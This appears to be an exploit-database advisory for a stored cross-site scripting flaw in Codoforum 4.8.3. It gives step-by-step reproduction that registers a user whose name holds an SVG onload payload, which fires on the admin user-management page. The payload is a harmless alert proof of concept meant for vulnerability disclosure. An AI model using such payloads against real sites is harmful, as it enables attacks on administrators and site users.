Exploits / Vulnerability Discovered : 2020-01-06 |
Type : webapps |
Platform : php
This exploit / vulnerability Codoforum 4.8.3 persistent crosssite scripting is for educational purposes only and if it is used you will do on your own risk!
Codoforum is prone to a stored xss vulnerability.
An attacker can exploit this issue to creating user with payload and perform cross-site scripting attacks.
Codoforum version 4.8.3 is vulnerable.
1. Install Codoforum 4.8.3 in a local server.
2. Goto http://localhost/index.php?u=/user/register
3. Create a user using :-
username : "><svg/onload=alert(1)>
password : password
email : c41m@email.com
4. Now goto http://localhost/admin/index.php?page=users/manage, an XSS alert popup will be triggered here.